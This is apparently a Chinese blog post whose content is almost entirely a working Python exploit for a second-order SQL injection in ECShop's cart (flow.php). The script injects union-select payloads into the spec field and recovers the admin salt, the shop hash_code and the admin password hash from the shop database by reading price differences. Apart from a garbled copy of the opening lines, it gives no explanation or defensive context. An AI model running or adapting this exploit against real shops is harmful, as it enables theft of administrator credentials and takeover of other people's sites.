ecshop二次注入
#coding=gbk#/usr/bin/env pythonimport urllib2,sysimport cookielibimport requestsimport re,binasciiattackurl=raw_input("输入漏洞网站:")attackid=raw_input("输入物ID:")attackprice=raw_input("输入物品价格:")def
·
#coding=gbk
#/usr/bin/env python
import urllib2,sys
import cookielib
import requests
import re,binascii
attackurl=raw_input("输入漏洞网站:")
attackid=raw_input("输入物ID:")
attackprice=raw_input("输入物品价格:")
def postdata(url,data="",regex=""):
r=s.post(url,data)
result=r.text
print result
if regex !="":
reg=re.findall(regex, result)
#print regex
#print reg
if reg:
return result,reg[0]
else:
return result
def infomation(url):
global spec,goods,price
goods=re.findall(r'id=(\d{1,5})',url)
spec=postdata(url,regex=r"spec_value_(\d{1,10})")
def sqlinjection(sql):
post_data={"goods":"""{"quick":1,"spec":["%s","%s"],"goods_id":%s,"number":"1","parent":0}"""%(spec[1],sql,goods[0])}
url=attackurl + "/flow.php?step=add_to_cart"
price=postdata(url,post_data,regex=ur"总计金额\s\S(\d{1,10})")
url=attackurl + "/flow.php"
goods_number=postdata(url,regex=r"goods_number\[.*\]")
goods_num=goods_number[1]
data={"%s"%(goods_num):"1","submit":"%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5","step":"update_cart"}
update_cart=postdata(url,data,regex=ur"购物车更新成功")
new_price=postdata(url,regex=ur"购物金额小计\s\S(\d{1,10})")
#print new_price,price,goods_number
if new_price[1]:
#res_price=int(new_price[1])-int(price[1])
res_price=int(new_price[1])-int(attackprice)
#print res_price
passwd=binascii.a2b_hex(str(res_price))
#清空购物车
url=url + "/flow.php?step=clear"
postdata(url)
return passwd
def get_salt():
sql="2') and 1=2 union select hex(substring(ec_salt from 1 for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"
print "salt is : " + sqlinjection(sql)
def get_hash_code():
passwd=""
for x in range(0,8):
sql="2') and 1=2 union select hex(substring(value from %d for 4)) from ecs_shop_config where code='hash_code' order by attr_price desc #"%(1+x*4)
passwd+=sqlinjection(sql)
print "hash_code is : " + passwd
def get_admin_pass():
global passwd
passwd=""
for x in range(0,8):
sql="2') and 1=2 union select hex(substring(password from %d for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"%(1+x*4)
passwd+=sqlinjection(sql)
print "admin_password is : " + passwd
get_salt()
get_hash_code()
if __name__ == "__main__":
s = requests.Session()
url=attackurl+"/goods.php?id="+attackid ##如果不存在 就要修改下id
infomation(url)
print "开始破解...(时间有点长,请耐心等待)"
get_admin_pass()
更多推荐
已为社区贡献4条内容
所有评论(0)